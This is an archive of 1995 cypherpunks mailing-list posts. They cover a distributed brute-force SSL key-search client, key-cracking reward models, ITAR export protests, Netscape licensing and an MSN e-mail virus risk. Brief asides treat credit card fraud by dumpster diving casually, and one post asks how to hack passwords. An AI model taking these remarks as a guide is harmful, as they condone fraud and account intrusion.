www.brute.cl.cam.ac.uk) the brutessl code here:

	http://dcs.ex.ac.uk/~aba/brutessl/

(both TAR file, and individual files untarred).

If and when people compile binaries for architectures which don't
typically come with compilers by default - such as DOS, OS/2, Macs,
I'll put any binaries sent to me in this directory.  When Piete gets
back, he'll either make a pointer to this repository, or copy it on to
www.brute.


UNIX client.

How to use the unix client...  download brclient from the www page:

	http://www.brute.cl.cam.ac.uk/brute/

it is a perl program so you may have to edit the path to perl (the 1st
line of the program should be #!/full/path/to/perl/binary), and you
will have to mark it as executable.

You will also need a shell script called brloop which uses brclient.
It is on Piete's "sources" page, this page is indexed from the main
brute page above, here it is explicitly.

	http://www.brute.cl.cam.ac.uk/ftp/pub/brute/README.html

So get brloop.

Get and compile the brutessl.tar.gz file.

Run brloop.

The brclient perl socket client talks to a machine with a DNS:

	sksp.brute.cl.cam.ac.uk on port number 19957

At the moment the server is not running so it will fail, but when
Piete starts it up, your client will periodically ask for work, before
the start time (Monday 12:00 GMT, or later time if this time is
changed) your client will just be told to sleep for a while, when it
wakes up it will ask for work again.  In this way the client can be
left ticking over, when work does arrive it will notice, as it will
actually recieve some work when it makes the request, and start doing
it, and reporting back when it finishes each chunk.

For a more detailed description of the socket protocol that Piete's
brclient will talk to the key server, have a look at this document
"SKSP Simple Key Searching Protocol" an SMTP like protocol for
requesting keys to search, and reporting back the results.

	http://www.brute.cl.cam.ac.uk/ftp/pub/brute/protocol.txt

(This is indexed from the main www.brute page under "new protocol".)


There is a windows NT socket client written by Andrew Brown, pointers
to that also.


If you want to write a socket client for another architecture (someone
mentioned PowerPC?) the protocol is reasonably straight forward, and
documented in the protocol.txt file above.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sat, 19 Aug 95 19:16:18 PDT
To: cypherpunks@toad.com
Subject: Re: Costs of Credit Card Fraud and Brute-Force Codebreaking
Message-ID: <199508200224.VAA11815@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>you're assessment that this cost our anon friend some money to obtain 
>these cc numbers is simply not true.  when you have nothing else to do, 
>choosing one thing over another involves no cost.  if anything, he made 
>money by using the cc numbers to make long dist calls instead of using 
>any cash he might have from working or an allowance.
>
>my $0.02,
>

There's also the factor that the dumpster diver is - if s/he continues the
practise in a certain area - going to learn which dumpsters are more likely
to contain valuta, thus reducing the 'overhead'.

My ha'penny :-)

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDZ9h8VrTvyYOzAZAQGQvgP+L/Zq5BChW1Y3ZkN5N0XCe2fw/QbWrgtt
2/6Mxdpg96ureHYfaPaxDTxstCC9pTyD6lrOqkCeu5/Pr/GZ8FFPRzPOx1xDdqmO
iufGGeUzRqcTcqRjOFBkBJ9GcZLgsZ3FZ4XtCCwQZ7w5aumBnA8xvfoP7DgCRrp1
55noMpWFwmk=
=g27w
-----END PGP SIGNATURE-----
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Sat, 19 Aug 95 21:33:12 PDT
To: cypherpunks@toad.com
Subject: Re: Economic Model for Key Cracking
In-Reply-To: <199508190800.BAA26793@ix9.ix.netcom.com>
Message-ID: <199508200433.VAA07070@quesnay.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Bill" == Bill Stewart <stewarts@ix.netcom.com> writes:

    > Alternatively, you could do a model where everybody gets paid,
    > but only after the answer is found, which discourages scammers
    > (since they don't get paid if they lie about searching the range
    > that has the real key.)  If a Bad Guy lies about the key not
    > being in his range, people do have an incentive to look for it
    > if the first pass fails, and have an incentive to finger him if
    > they do find the key on a later pass.  

But the scammer who has done his or her math homework will recognize
that it's reasonably unlikely that his or her assigned range contains
the true key (depending, of course, on the size of the assigned
range...).  Thus, on the average, if everyone gets paid, a scammer
will make money by not actually searching the range assigned (perhaps
actually using the CPU time on a different key search).

I think it'd also be important to reward those who throw more compute
power at the task more than those who just sic a desktop on the job.
This is handled elegantly by the first method -- the person who
dedicates some giant supercomputer to the task is that much more
likely to find the key and be rewarded...

-sq






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sat, 19 Aug 95 21:53:55 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Certificates/Anonymity/Policy/True Names
Message-ID: <8AF7577.0003000342.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


TC> This happens all the time, though "I am not a lawyer," in disputes about
TC> whether a contract was signed properly, about whether the signer had the
TC> right authority, etc. And it is apparently not necessary to have the
TC> "state" establish itself, for example, as the keeper of signatures.

  But the state does establish Notaries Public, and courts put special
credence in the validity of signatures witnessed by them. Which is to be
expected, of course, having the King's X being good in the King's
courts.

  I don't see this as an either/or binary at all. To me, the natural
thing to do is for a person who is already a Notary under the laws of a
state to offer digital notary services. I would expect the State of
California or Commonwealth of Massachussets to have the Secretary of
State's office (or whoever is in charge of Notary Credentials there) to
digitally sign the public keys of any Notaries commissioned thereby.

  In fact, I would like to see provision made for a digital signature to
have an expiration date included, so that the SoS office could have its
signature on a key set to expire along with the Notary's commission.

  Thus the existing state framework for verification of identity and
consent on contracts is extended into the electronic sphere seamlessly.
None of which prevents you or I from doing business without the services
of the Royal Notary.


 * ZenCrafters - Total Enlightenment in about an hour
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Prickett <jprickett@lightlink.satcom.net>
Date: Mon, 28 Aug 95 12:43:10 PDT
To: cypherpunks@toad.com
Subject: GOST ??
Message-ID: <Pine.LNX.3.91.950819232149.13352A-100000@lightlink.satcom.net>
MIME-Version: 1.0
Content-Type: text/plain


        Does anyone know what the legal status of the Russian cypher
"GOST" is ?  Is it public domain, patented, proprietary or what ?  It
looks like it would be more efficient than DES when implemented on a
microprocessor or microcontroller.
 
	Also the DDJ article mentioned that like DES, there are good and
bad S-boxes for GOST.  Does anyone know how to choose a strong S-box for
GOST ?
 
	Jim Prickett





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rosaphil <rugosa@escape.com>
Date: Sat, 19 Aug 95 23:41:05 PDT
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: Red Shift
In-Reply-To: <199508190140.DAA01774@utopia.hacktic.nl>
Message-ID: <Pine.BSD/.3.91.950820022737.6411C-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



	any mericans involved?

	could somoen please post the jeapordy questions posed
	in the game played at cybercon?

	also, anyhone know how to hack axxess passwords?

	just curios?

	



             (Better Living Thru Better Living)                    
***************************************************************************
*        SNAIL ME             +      GABRIELLI'S  *ZINFANDEL*  (RED) &    *
*      YER ROSEHIPS           +                                           *
*  IF YOU LIKED THIS POST!    +     *ASCENZA*  (WHITE-BLEND)---YUMMY!     *
***************************************************************************
               [Ask Fer  *Gabrielli Wine*  at 
		yer local liquor store if'n ya
		want to tend yer rugosa]


	Let your voice be heard in the campaign to save the life of
	 		     Mumia Abu Jamal

               ++++ stop de execution of Mumia Abu-Jamal ++++
       ++++ if you agree copy these 3 sentences in your own sig ++++
     ++++ more info: http://www.xs4all.nl/tank/spg-l/sigaction.htm ++++






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 19 Aug 95 23:42:50 PDT
To: cypherpunks@toad.com
Subject: Netscape to copyright URLs?
Message-ID: <199508200639.CAA03066@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Today's surf of Netscape's home page yielded an interesting question. Is
Netscape trying to licence links to their products? To me
http://home.netscape.com/comprod/mirror/netscape_now_program.html seems to
suggest tha you can only display certain logos and info if you are
licensed by Netscape. You could for example not put up a link to their
"Download Netscape NOW" page without prior approval by Netscape.

This seems to be a new development on the web. Since when does one need a
license to include certain URLs in one's home page?

Comments?

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDbYcCoZzwIn1bdtAQHE1gF/WoY8jEAv16lL1pGylJKp4MZnVsKYRfMe
SzgQcpGouFnT6Ij+zwlS7dkuudQIJyvX
=b88z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 19 Aug 95 23:51:07 PDT
To: cypherpunks@toad.com
Subject: Would it be legal for a foreign site to carry Netscape?
Message-ID: <199508200647.CAA03141@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

If someone would export the full 128 bit version of Netscape, would it be
legal to make it available on a foreign site? After all, Netscape is a
copyrighted product.

TIA,

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDbaNioZzwIn1bdtAQEb/gF+JJ9e3FqwEwIboLX7ISW6X4QWjcO6QCkt
gMuEghppSrv2G2sPmzyDzOoweTlglfi/
=Y7nR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sat, 19 Aug 95 20:05:41 PDT
To: cypherpunks@toad.com
Subject: Re: Spooks and Hackers, etc.
Message-ID: <199508200305.AA18530@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Brad Dolan sez:

: ---------- Forwarded message ----------
: Subject: Internet Police

: According to an AP story, Wisconsin Attorney General James Doyle says that
: police must monitor the Internet to stop child porn, drug trafficking, and
: fraud.

: "We need to see that police are surfing the Internet just as other people
: are," Doyle said. "This is a good example of where the law is slower than
: technology."

"Stop Wisconsin Internet Police" "Your'e speeding" 

  "Get Lost" "Get Real"

--
Alex de Joode
Fear Uncertainty Confusion and Kaos, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Murray slIP <sdavidm@iconz.co.nz>
Date: Sat, 19 Aug 95 14:45:22 PDT
To: cypherpunks@toad.com
Subject: The greater socio-economic good
Message-ID: <199508192145.JAA09259@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


I came acreossoss this in the july Law UPdate of Phillips Fox,
an Auastralasionan law firm. This edition was entitled 'Your money
or your E-cash', and hasd a section entitled 'Privacy' which said/says:

At the moment, your cahsh transactions cannot be recorded in the same
way as your cheque, credit cards or Eftpos spending. This means that
your cash spending cannot be readily traced, checked, investigated or
analysed. The big excitement for banks, marketing consultants and
governments is being able to do all these things. On the other hand, toatally
untraceable e-cash will enable huge amounts of money to be moved (laundered)
outside the bankiongng systyeem. Consumers will need to make a 
decision whether they want untraceable e-cash, or to contribute to the
greater socio-economic good.

I think they're being serious?

DM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@cmu.edu (Matthew Ghio)
Date: Sun, 20 Aug 95 07:50:27 PDT
To: cypherpunks@toad.com
Subject: Re: Would it be legal for a foreign site to carry Netscape?
In-Reply-To: <199508200647.CAA03141@bb.hks.net>
Message-ID: <m0skBUq-000wP1C@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green <shamrock@netcom.com> asked:
> If someone would export the full 128 bit version of Netscape, would
> it be legal to make it available on a foreign site? After all, Netscape
> is a copyrighted product.

It would depend on what the license agreement said.

But why not just write a wrapper which strips out the 88 bits of plaintext
key?  (A "leaf blower" if you like:)  If you could get the author of slirp
to include it in his distribution, it would definately get used.  All you
would have to say is "This is a patch to ensure that netscape encryption
is properly secure when using slirp, and here are the diffs..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 20 Aug 95 10:51:44 PDT
To: Andrew Spring <Andrew.Spring@ping.be>
Subject: Re: NSA into antigravity?
In-Reply-To: <v01510101ac5d1e46d09f@[193.74.217.8]>
Message-ID: <Pine.SUN.3.91.950820103443.29900A-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 20 Aug 1995, Andrew Spring wrote:

> Missile targeting software depends on good models of the earth's gravity
> for accuracy, both for design and for simulation purposes. . .

Not so much a model as an exact map of earth's gravity field.
Twenty years ago, I was friends with a scientist who had worked
for the US government some years before that.  He sailed around
the North Atlantic in a ship that contained extremely sensitive
gravity measuring devices.  He was mapping masscons on the ocean
floor so that their effect on intercontinental ballistic missiles
could be taken into account when targetting the missiles.

The equipment was sensitive enough to measure the gravity
gradient between sea level and altitude of a meter or two.  Since
the ship on which he sailed regularly experienced swells of that
magnitude or greater, other equipment was used to measure the
swells and to mathematically cancel out their effect.  Cool.

I can see why the folks at Ft. Meade would be hinkie about such
measurements being made around them.  No need to hypothisize
micro-singularities or anti-gravity experiments.  Occam's Razor
in action.


 S a n d y

 Who must secretly work for the NSA's disinformation department.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harveyrj@vt.edu (R. J. Harvey)
Date: Sun, 20 Aug 95 08:11:41 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape to copyright URLs?
Message-ID: <9508201511.AA06361@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:39 AM 8/20/95 -0400, Lucky Green wrote:
>Today's surf of Netscape's home page yielded an interesting question. Is
>Netscape trying to licence links to their products? To me
>http://home.netscape.com/comprod/mirror/netscape_now_program.html seems to
>suggest tha you can only display certain logos and info if you are
>licensed by Netscape. You could for example not put up a link to their
>"Download Netscape NOW" page without prior approval by Netscape.
>
>This seems to be a new development on the web. Since when does one need a
>license to include certain URLs in one's home page?
>
>Comments?
>
  My reading of that page suggests a somewhat different motive
and interpretation:  what they seem to be doing is copying the
Microsoft approach with respect to setting criteria that must be
met before you can use their logo on your page/product.  It doesn't 
prohibit putting links to their download page; it just prohibits
using their "Netscape Now!" logo without their permission.
  Note the criteria for being allowed to use their logo:  you
have to design your server to break with the current "standards"
(e.g., CGI) and embrace Netscape's extensions (e.g., backgrounds;
client pull/server push, SSL encrypted transactions), which they 
would like to foist on us as the new "standard."
  Essentially, they want us to help them create the perception
that if you don't show the "Netscape Now!" flag (didn't Nixon have
a similar slogan?) on your page, that you're just not a high-
quality operation.  Or maybe they're trying to change the subject
from the unfortunate publicity from the success of SSL Challenge...

rj

------------------------------------------------------------
R. J. Harvey               email:  harveyrj@vt.edu
WWW for job analysis/personality:  http://harvey.psyc.vt.edu/
PGP key at http://harvey.psyc.vt.edu/RJsPGPkey.txt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 20 Aug 95 12:19:48 PDT
To: cypherpunks@toad.com
Subject: Re: MSN hackers heaven (fwd)
Message-ID: <199508201919.MAA20699@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain



>The bottom line: Users of MSN are placing themselves at significant risk.
>If one must use MSN, avoid at all cost activating (double-clicking) objects
>in e-mail messages and BBS posts.  Sophisticated users may think they know
>what they are doing, but it probably won't be long before they are outwitted
>by someone who figures out how to totally disguise an object's true purpose.

It it just Microsoft's way of guaranteeing "good times" for all. ];>

(Its a cheap shot, but someone has to take it.)
|        What mime type is Marcell Marceu?        | alano@teleport.com   |
|"Would you rather be tortured by the government  | Disclaimer:          |
|forces or the people's liberation army?" -mklprc | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sun, 20 Aug 95 10:03:33 PDT
To: cypherpunks@toad.com
Subject: MSN hackers heaven (fwd)
Message-ID: <Pine.SOL.3.91.950820125605.17569B@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------

Subject: The MSN is Hacker Heavan


As most of us are aware, the commercial online services, such as AOL,
Compuserve and Prodigy, represent certain risk to the unsophisticated user.
Unfortunately, the Microsoft Network (MSN) raises the vulnerability of such
users to unprecedented heights.

Key to this vulnerability is the richness and complexity of the MSN/Windows
95 environment.  What is most dangerous is the ability for the author of an
e-mail or (certain) BBS documents to embed "objects" in that document. These
objects can be readily disquised to appear totally benign to the casual user
and be nothing more than MSN navigational aids.  Once double-clicked by the
recipient, these objects can readily infect the recipient's PC with a virus.
Worse, what this object could do is only limited by one's imagination.  It
is worthwhile noting that MSN appears to be migrating to an open
architecture, with the MSN user connecting through the Internet.  If this is
true, there is nothing which prevents an object, once activated, from
transmitting information stored on the user's PC to any other location on
the Internet.

In theory, embedded objects can be interrogated to ensure their validity.
Unfortunately, this interrogation process is not likely to be carried out by
the average user.  Even if it is, the user is not likely to understand what
they are looking at.  It is like warning automobile drivers to look under
the hood of their car before starting it to make sure there is not a bomb
inside.  Most drivers would assume that the odds were with them.  Those that
did check would have no idea what they were looking at.  (At least that's my
feeling when I look under the hood of my car :-).

Microsoft's position appears to be that the MSN user is no more vulnerable
than one who uses a competing system.  I would maintain that this position
is just not true.  With system complexity comes excessive vulnerability.
MSN rates a 9 in complexity.  The other services a 4.

The bottom line: Users of MSN are placing themselves at significant risk.
If one must use MSN, avoid at all cost activating (double-clicking) objects
in e-mail messages and BBS posts.  Sophisticated users may think they know
what they are doing, but it probably won't be long before they are outwitted
by someone who figures out how to totally disguise an object's true purpose.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 20 Aug 95 12:58:17 PDT
To: cypherpunks@toad.com
Subject: Re: NSA into antigravity?
Message-ID: <ac5ce06c020210044231@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(No, I see no relevance for "coding in C," but even critics of "off-topic"
posts have commented on this, so I will too, especially as how physics was
my old career and in 1974 I interviewed with a Santa Barbara company doing
ICBM geogravitic trajectory work.)

At 5:50 PM 8/20/95, Sandy Sandfort wrote:

>I can see why the folks at Ft. Meade would be hinkie about such
>measurements being made around them.  No need to hypothisize
>micro-singularities or anti-gravity experiments.  Occam's Razor
>in action.

I can't. At least not with regard to microgravity measurements. If you mean
missile trajectory  stuff, this is extremely implausible. A missile
targetted at Fort Meade is not going to be deflected by more than a few
centimeters (if that much) by nearby variations...the missile is moving
very fast and there's little "integration time" for slight errors in
trajectory to build up. (Also, but related to this, the closing trajectory
is near vertical, so it's doubly hard to imagine local g-field anomalies
affecting the point of impact.)

As to what the folks were doing with their equipment, I have no idea. Maybe
measuring water tables in and around the Chesapeake Bay (only a few miles
from the Fort). The NSA people probably were upset with the equipment
itself, not the idea that Meade was being more precisely targetted for
ICBMs.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 20 Aug 95 11:58:23 PDT
To: Andrew.Spring@ping.be (Andrew Spring)
Subject: Re: NSA into antigravity?
In-Reply-To: <v01510101ac5d1e46d09f@[193.74.217.8]>
Message-ID: <199508201857.OAA03000@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Andrew Spring writes:
> Missile targeting software depends on good models of the earth's gravity
> for accuracy, both for design and for simulation purposes.  Since Ft. Meade
> was doubtless the target of many nukes during the cold war (and probably
> still is), that may account for them having a bug up their asses on the
> subject.

More likely if you were working for the NSA and some people were
driving about your place with expensive electronic monitoring
equipment you would get nervous, too, until you knew precisely what
they were doing.

.pm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 20 Aug 95 12:13:42 PDT
To: cypherpunks@toad.com
Subject: A glance at the future of missing child identification
Message-ID: <199508201909.PAA07003@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

We all read the stories. "Infant stolen from crib in Hospital", "Thousands
of children abducted every year". Many parents would jump at the anything
that might increase the chance of recovering their children should they be
abducted. Just take a look at lines during "Child Fingerprint Days" at you
local mall.

The solution? Transponder implants at birth. Modern transponders can be
injected into an infant where they grow into the tissue, unable to be
removed without major surgery. If schools make implants a requirenment,
such as vaccinations are today, children can be routinely scanned when
entering kindergarden. Later in life, the same transponders can be used to
verify legal age for obtaining a driver license or purchasing alcohol. 
The transpoders also provide ID for the ATMs and credit card termials of
the future. No criminal can loot your account. You can leave the ATM card
at home. How convenient! 

How do you prevent the dead from voting? Simple. One transponder, one vote.

Even better, childmolesters, individuals out on bail or parole, and other
"security risks" can be similarily tagged to prevent escape from US
jurisdiction.  A combination metal detector/scanner for airport and border
use is just one of the obvious ideas to increase the value of this
technology.

For an example of such a transponder see
http://www.dfw.net/~tqg/eid/tx1400l.html

I predict that you will see the first such implants in children within
five years. An enterprising Cypherpunk who has become disillusiond that
the statists can be stopped could make a fortune by offering a "Children's
Safety Identification Service." 

Any idea if offering such a service would require an M.D. or only a R.N.?
Perhaps even a cosmetology licesnse would suffice, since "body piercers"
do similar insertions every day.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDeIayoZzwIn1bdtAQFo3QGAzU13qIy4qIeKQ7F13JtmnRE4Oo4AsXpt
RktLZfE/8K8EauRuisl/MxU23oMkTgD0
=Vm+o
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lindsay Haisley <fmouse@fmp.com>
Date: Sun, 20 Aug 95 13:50:44 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Netscape to copyright URLs?
Message-ID: <199508202050.PAA19345@zoom.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:39 AM 8/20/95 -0400, you wrote:
>Today's surf of Netscape's home page yielded an interesting question. Is
>Netscape trying to licence links to their products? To me
>http://home.netscape.com/comprod/mirror/netscape_now_program.html seems to
>suggest tha you can only display certain logos and info if you are
>licensed by Netscape. You could for example not put up a link to their
>"Download Netscape NOW" page without prior approval by Netscape.
>
>This seems to be a new development on the web. Since when does one need a
>license to include certain URLs in one's home page?

The Netscape general info document specifically states ....

>Aside from the ftp mirrors we list on our home page, we do not allow
>redistribution of our software.  This means that it is not legal to put
>our software on your ftp server, nor to include it on disks you are
>distributing, although you're more than welcome to include a pointer to
>our home pages so that people can download the latest version for
>themselves. 

They have specifically given permission here for links, at least to their
home pages, possibly even to other items such as a downloadable netscape.


                                  (______)
Lindsay Haisley                     (oo)        "The bull 
FMP Computer Services         /------\/            stops here!"
fmouse@fmp.com               / |    ||  
Austin, Texas, USA          *  ||---||
(512) 259-1190                 ~~   ~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 20 Aug 95 13:03:19 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: NSA into antigravity?
In-Reply-To: <ac5ce06c020210044231@[205.199.118.202]>
Message-ID: <199508202002.QAA03115@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> 
> (No, I see no relevance for "coding in C," but even critics of "off-topic"
> posts have commented on this,

Because it isn't off topic. It was small and reasonably on-topic. So
are discussions of personal privacy, clipper, electronic cash, NSA
proceedure, and similar stuff. Its the long conspiracy theory rants
about Waco that are pure noise.

Furthermore, Tim, no one ever suggested that coding in C was the only
possible way people could contribute to the efforts we are
making. Popularization, lobbying, legal work, are all important.

It was the constant stream of posts about militias, Vincent Foster's
shoe size, and the like, which we were flaming.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 20 Aug 95 13:12:42 PDT
To: cypherpunks@toad.com
Subject: MSN hackers heaven (fwd)
Message-ID: <199508202012.QAA26057@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   This is a variation on Brad's forward of the MSN security
   hole:

   Information Week, August 28, 1995, p. 24.


   Risk Looms On Microsoft Network. E-mail icons can hide
   viruses.


   A feature designed to make electronic mail easy to use on
   the Microsoft Network online service may also make it
   easier for hackers to trick users into running destructive
   software programs on their PCs.

   When a Microsoft Network user sends a binary file embedded
   in an E-mail message, the file appears as an icon on the
   recipient's screen. The recipient can double-click on the
   icon to automatically download the embedded file and
   execute it. To download the file without executing it, the
   recipient must use the mouse's right button, which has been
   rarely needed until now.

   Though other online services offer automatic downloading of
   files, Microsoft's goes one step further in allowing the
   file's automatic execution. That file could be a virus or
   other malicious program that could erase files or reformat
   a hard disk, according to Mike Wyman, VP and chief
   technical offficer of Interactive Data Corp., an investment
   information firm in Lexington, Mass., and a Microsoft
   Network beta user. "On the Microsoft Network, I can
   disguise an icon so that it looks innocuous," says Wyman.
   "The analogy I like to use is the Unabomber. If you get a
   package in the mail that's wrapped in duct tape and brown
   paper, you'd regard it as suspicious. But if it's a plain
   white envelope with Ed McMahon's picture on it, you
   wouldn't think twice about opening it."

   Microsoft says the feature is a convenience, not a security
   hole. "There are risks of getting [data] off the network in
   any form," says George Meng, group product manager for the
   Microsoft Network in Redmond, Wash. "People have to be
   aware of what the source of information is."

   Winn Schwartau, president of Interpact Inc., a computer
   security consulting firm in Seminole, Fla., disagrees. "If
   the ability to execute programs bypasses conventional
   filtering and virus controls, then you certainly have a
   security hole," he says "Potential 'Trojan horse' programs
   could be sent by anyone."

   By Mitch Wagner and Clinton Wilder

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sun, 20 Aug 95 17:41:11 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Netscape to copyright URLs?
Message-ID: <8AF83E3.000300034C.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


RJ>   Essentially, they want us to help them create the perception
RJ> that if you don't show the "Netscape Now!" flag (didn't Nixon have
RJ> a similar slogan?) on your page, that you're just not a high-
RJ> quality operation.  Or maybe they're trying to change the subject

  Let's just create our own flag, and use it instead, then.


 * If we had ham,
 * We could have ham and eggs,
 * If we had eggs.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 20 Aug 95 14:10:51 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Another SSL breakage...
In-Reply-To: <7849.9508171510@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.D-G.3.91.950820165648.14336E-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 17 Aug 1995 aba@dcs.exeter.ac.uk wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
> All hell seems to have broken loose whilst I was lazing on the beach
> yesterday.  SSL breakings, big name newspaper newsreports (of varying
> degrees of accuracy), and much ITAR bashing (yay!) or perhaps that
> should be nooooh! 'cos I might be doing myself out of work as a UK
> crypto hacker (as John Hemming said in the article Robert Hettinga
> forwarded) if we loose the fun advantage of being in the free world,
> and not having to follow the ITAR nonsense.
> 
> Anyway, congratulations Damien!

I add my congratulations to everyone else's.  But, as the list rejoices 
that this means the "end of ITAR" or, more accurately put the "end of 
encryption programs as 'munitions'", I've got to play the devil's advocate.
Many of you, of course, see me as the Devil's Advocate.  

Anyway, certain arms of the government want to prevent strong crypto from 
being exported so that they can easily decode encrypted messages from 
abroad (at least those using US developed software).  Damien's impressive 
feat is that exportation of weak crypto indeed makes that possible.  Some 
posters have discussed the time and difficulty in decoding strong crypto 
... I think all agree that it would take significantly longer (or much 
more computer time) but is not impossible.

So ... has this proven that the banning of strong crypto is the correct 
